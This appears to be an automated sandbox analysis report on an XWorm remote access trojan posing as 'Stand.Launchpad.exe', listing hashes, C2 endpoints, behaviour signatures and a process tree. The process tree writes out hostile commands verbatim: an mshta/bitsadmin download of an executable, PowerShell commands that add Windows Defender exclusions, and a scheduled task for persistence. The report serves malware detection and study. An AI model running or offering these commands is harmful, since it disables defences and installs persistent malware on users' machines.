Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-05-2024 04:12

General

  • Target

    Stand.Launchpad.exe

  • Size

    140KB

  • MD5

    bec01d16b6f3c443eb3912042c1fc7f9

  • SHA1

    436c7fabff54997f2e550754edea0ae791080c9b

  • SHA256

    2aa6b748a1ee67ba3f68a53228bbc14ed8ce1285e1dde54d310e2ca8797eb779

  • SHA512

    4101f563c479a22883a024cbd9ba9d5a46234a237471b14853a82263e96f0ac74eb101dd77a71aab98101c8cb1c9c15ed987a45b3540d300c6bb740b707b27e1

  • SSDEEP

    3072:J5XMHZjqrraIh3GGKt6cGuPN1OHXFhTVR7NetgV:H85jqrWIhGlN1sVhTwtg

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:40971

us3.localto.net:40971

Name1442-40971.portmap.host:40971

Attributes
  • Install_directory

    %Temp%

  • install_file

    Stand.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe
    "C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.exe
        3⤵
        • Download via BitsAdmin
        PID:4064
      • C:\Users\Admin\AppData\Local\Temp\Stand.exe
        "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
    • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
      "C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2276
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2996
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
        3⤵
        • Creates scheduled task(s)
        PID:2172
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1544
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      1⤵
        PID:1844

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Stand.Launchpad.exe.log

        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        d28a889fd956d5cb3accfbaf1143eb6f

        SHA1

        157ba54b365341f8ff06707d996b3635da8446f7

        SHA256

        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

        SHA512

        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        7a451cd1316d70a65910773fee8c3a43

        SHA1

        d2db32d5037153dd1d94565b51b5b385817a3c3d

        SHA256

        862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c

        SHA512

        60887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        cdf113430dd2b0560c16a4927250105c

        SHA1

        d6d8ec180136a243cfba776439f1a5a303cdb18a

        SHA256

        0fe47567ce2c2aee76f3a3befe6491b540b1367a2b4d9cdacdf5f7eea981a93d

        SHA512

        968843bd781bf4a65d9c973b2bc7d576c7b5cb8585fe97c5082039f97b28659f7a4fa0cce654c6f1cf121631fa04de059c186aff30bdd98c19b86f358b000bfd

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogc3ghue.rhm.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Downloader.hta

        Filesize

        893B

        MD5

        b0a6d4e05dc2225dd03902a3061a4041

        SHA1

        39c500eefbf78d7d51768edb6983c361213cb7b8

        SHA256

        05e5c927c6366bebab2fb341d233887f503fb692d8f6880f7d1327b64705c1ee

        SHA512

        96fb1e3046a0daddd6a17a38fcfa8ad6e00f8c4950cc7e46c8a79b24817b2f271229d15facaa510105d3c95234a9f095fdf8ff8bbb8099c47565bd955c316918

      • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

        Filesize

        108KB

        MD5

        d51da3fa31165f2536dddad44974af34

        SHA1

        703a62d92fbfe23611297715ca50bb82b4ff55a1

        SHA256

        9cc68d4ab822bd8e5fd66f40b2c99bce04805505e593027aca67256ab63c6210

        SHA512

        3adfaf5e251d974a9d576c71e51e3b1c59ddee2feecf281801166cf9448a3e51e6066737c06bee20089721630f4016f16ae7297061112cb23f2fe786386e4197

      • memory/2336-21-0x000001BA3D500000-0x000001BA3D522000-memory.dmp

        Filesize

        136KB

      • memory/2412-73-0x000001C5E2030000-0x000001C5E2046000-memory.dmp

        Filesize

        88KB

      • memory/3272-20-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp

        Filesize

        10.8MB

      • memory/3272-18-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp

        Filesize

        10.8MB

      • memory/3272-17-0x0000000000900000-0x0000000000920000-memory.dmp

        Filesize

        128KB

      • memory/3272-71-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp

        Filesize

        10.8MB

      • memory/3272-72-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp

        Filesize

        10.8MB

      • memory/4948-0-0x00007FF9EA913000-0x00007FF9EA915000-memory.dmp

        Filesize

        8KB

      • memory/4948-1-0x0000000000F40000-0x0000000000F68000-memory.dmp

        Filesize

        160KB